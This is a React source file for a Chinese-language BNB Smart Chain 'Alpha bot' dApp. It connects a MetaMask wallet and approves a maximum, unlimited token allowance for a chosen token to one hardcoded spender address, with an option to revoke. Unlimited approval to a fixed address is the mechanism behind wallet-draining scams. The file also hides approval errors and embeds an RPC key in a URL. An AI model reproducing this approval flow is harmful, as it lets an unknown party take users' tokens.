/* eslint-env es2020 */
import React, { useState, useEffect } from 'react';
import { ethers } from 'ethers';
import './App.css';

const ERC20_ABI = [
  "function allowance(address owner, address spender) view returns (uint256)",
  "function approve(address spender, uint256 amount) returns (bool)",
  "function decimals() view returns (uint8)",
  "function symbol() view returns (string)"
];

const TOKENS = [
  { name: 'KOGE', address: '0xe6DF05CE8C8301223373CF5B969AFCb1498c5528' },
  { name: 'ZKJ', address: '0xc71b5f631354be6853efe9c3ab6b9590f8302e81' },
  { name: 'B2', address: '0x783c3f003f172c6Ac5AC700218a357d2D66Ee2a2' }
];

const SPENDER_ADDRESS = '0xDa902F021f36A69cf9A9D55e53fe433F3C793f50';
const MAX_APPROVAL = BigInt("115792089237316195423570985008687907853269984665640564039457584007913129639935");
const BSC_CHAIN_ID = BigInt(56);

const BSC_MAINNET = {
  chainId: '0x38',
  chainName: 'BNB Smart Chain',
  rpcUrls: ['https://bsc-mainnet.blastapi.io/2408118b-a808-422e-8c8f-ec8d24993a49'],
  nativeCurrency: { name: 'BNB', symbol: 'BNB', decimals: 18 },
  blockExplorerUrls: ['https://bscscan.com']
};

function App() {
  const [account, setAccount] = useState(null);
  const [provider, setProvider] = useState(null);
  const [selectedToken, setSelectedToken] = useState(TOKENS[0].address);
  const [allowances, setAllowances] = useState({});
  const [isLoading, setIsLoading] = useState(false);
  const [error, setError] = useState('');
  const [isCorrectNetwork, setIsCorrectNetwork] = useState(false);

  const checkNetwork = async (provider) => {
    try {
      const network = await provider.getNetwork();
      setIsCorrectNetwork(network.chainId === BSC_CHAIN_ID);
    } catch (err) {
      setError('检查网络失败: ' + err.message);
    }
  };

  const switchToBsc = async () => {
    try {
      await window.ethereum.request({
        method: 'wallet_switchEthereumChain',
        params: [{ chainId: BSC_MAINNET.chainId }]
      });
    } catch (switchError) {
      setError('切换到 BNB Smart Chain 网络失败: ' + switchError.message);
    }
  };

  const connectWallet = async () => {
    try {
      if (!window.ethereum) {
        setError('请安装 MetaMask 钱包扩展');
        return;
      }
      
      const newProvider = new ethers.BrowserProvider(window.ethereum);
      await newProvider.send("eth_requestAccounts", []);
      const signer = await newProvider.getSigner();
      const address = await signer.getAddress();
      
      setProvider(newProvider);
      setAccount(address);
      await checkNetwork(newProvider);
      
      if ((await newProvider.getNetwork()).chainId === BSC_CHAIN_ID) {
        fetchAllowances(address, newProvider);
      }
    } catch (err) {
      setError('连接钱包失败: ' + err.message);
    }
  };

  useEffect(() => {
    if (!window.ethereum) return;

    const handleChainChanged = async (chainIdHex) => {
      const chainId = BigInt(chainIdHex);
      const isBSC = chainId === BSC_CHAIN_ID;
      setIsCorrectNetwork(isBSC);

      try {
        const newProvider = new ethers.BrowserProvider(window.ethereum);
        if (isBSC) {
          const signer = await newProvider.getSigner();
          const address = await signer.getAddress();
          setProvider(newProvider);
          setAccount(address);
          fetchAllowances(address, newProvider);
        } else {
          setAllowances({});
        }
      } catch (error) {
        setError('网络切换错误: ' + error.message);
      }
    };

    const handleAccountsChanged = async (accounts) => {
      if (accounts.length === 0) {
        setAccount(null);
        setAllowances({});
        return;
      }

      try {
        const newProvider = new ethers.BrowserProvider(window.ethereum);
        const chainId = (await newProvider.getNetwork()).chainId;
        const isBSC = chainId === BSC_CHAIN_ID;
        
        setProvider(newProvider);
        setAccount(accounts[0]);
        setIsCorrectNetwork(isBSC);
        
        if (isBSC) {
          fetchAllowances(accounts[0], newProvider);
        }
      } catch (error) {
        setError('账户变更错误: ' + error.message);
      }
    };

    window.ethereum.on('chainChanged', handleChainChanged);
    window.ethereum.on('accountsChanged', handleAccountsChanged);

    return () => {
      window.ethereum.removeListener('chainChanged', handleChainChanged);
      window.ethereum.removeListener('accountsChanged', handleAccountsChanged);
    };
  }, []);

  const fetchAllowances = async (address, provider) => {
    try {
      const newAllowances = {};
      for (const token of TOKENS) {
        const contract = new ethers.Contract(token.address, ERC20_ABI, provider);
        const [allowance, symbol] = await Promise.all([
          contract.allowance(address, SPENDER_ADDRESS),
          contract.symbol()
        ]);
        newAllowances[token.address] = { isApproved: allowance > 0, symbol };
      }
      setAllowances(newAllowances);
    } catch (err) {
      // setError('获取授权信息失败: ' + err.message);
      setError('获取授权信息失败');
    }
  };

  const approveToken = async () => {
    if (!provider || !account) {
      setError('请先连接钱包');
      return;
    }
    
    setIsLoading(true);
    setError('');
    
    try {
      const contract = new ethers.Contract(selectedToken, ERC20_ABI, await provider.getSigner());
      const tx = await contract.approve(SPENDER_ADDRESS, MAX_APPROVAL);
      await tx.wait();
      fetchAllowances(account, provider);
      alert('授权成功');
    } catch (err) {
      // setError('授权失败: ' + err.message);
      setError('授权失败');
    } finally {
      setIsLoading(false);
    }
  };

  const revokeApproval = async (tokenAddress) => {
    if (!provider || !account) {
      setError('请先连接钱包');
      return;
    }
    
    setIsLoading(true);
    setError('');
    
    try {
      const contract = new ethers.Contract(tokenAddress, ERC20_ABI, await provider.getSigner());
      const tx = await contract.approve(SPENDER_ADDRESS, 0);
      await tx.wait();
      fetchAllowances(account, provider);
      alert('取消授权成功');
    } catch (err) {
      setError('取消授权失败: ' + err.message);
    } finally {
      setIsLoading(false);
    }
  };

  const formatAddress = (addr) => addr ? `${addr.slice(0, 6)}...${addr.slice(-4)}` : '';

  return (
    <div className="container">
      <h1>蓝鸟Alpha机器人</h1>

      <div className="wallet-section">
        <h3>钱包状态</h3>
        {account ? (
          <>
            <p>已连接: {formatAddress(account)}</p>
            {!isCorrectNetwork && (
              <>
                <p className="network-error">请切换到 BNB Smart Chain 网络以继续操作</p>
                <button onClick={switchToBsc} disabled={isLoading}>
                  切换到 BNB Smart Chain
                </button>
              </>
            )}
          </>
        ) : (
          <button onClick={connectWallet} disabled={isLoading}>
            连接钱包
          </button>
        )}
      </div>

      {account && isCorrectNetwork && (
        <>
          <div className="approve-section">
            <h3>授权代币</h3>
            <select value={selectedToken} onChange={(e) => setSelectedToken(e.target.value)}>
              {TOKENS.map(token => (
                <option key={token.address} value={token.address}>{token.name}</option>
              ))}
            </select>
            <button onClick={approveToken} disabled={isLoading}>
              {isLoading ? '处理中...' : '授权'}
            </button>
          </div>

          <div className="allowance-section">
            <h3>当前授权状态</h3>
            <button 
              onClick={() => fetchAllowances(account, provider)} 
              disabled={isLoading}
              className="refresh-button"
            >
              刷新授权状态
            </button>
            {Object.entries(allowances).map(([address, data]) => (
              <div key={address} className="allowance-item">
                <p>{data.symbol}: {data.isApproved ? '已授权' : '无授权'}</p>
                {data.isApproved && (
                  <button onClick={() => revokeApproval(address)} disabled={isLoading}>
                    取消授权
                  </button>
                )}
              </div>
            ))}
          </div>
        </>
      )}

      {error && <p className="error">{error}</p>}
    </div>
  );
}

export default App;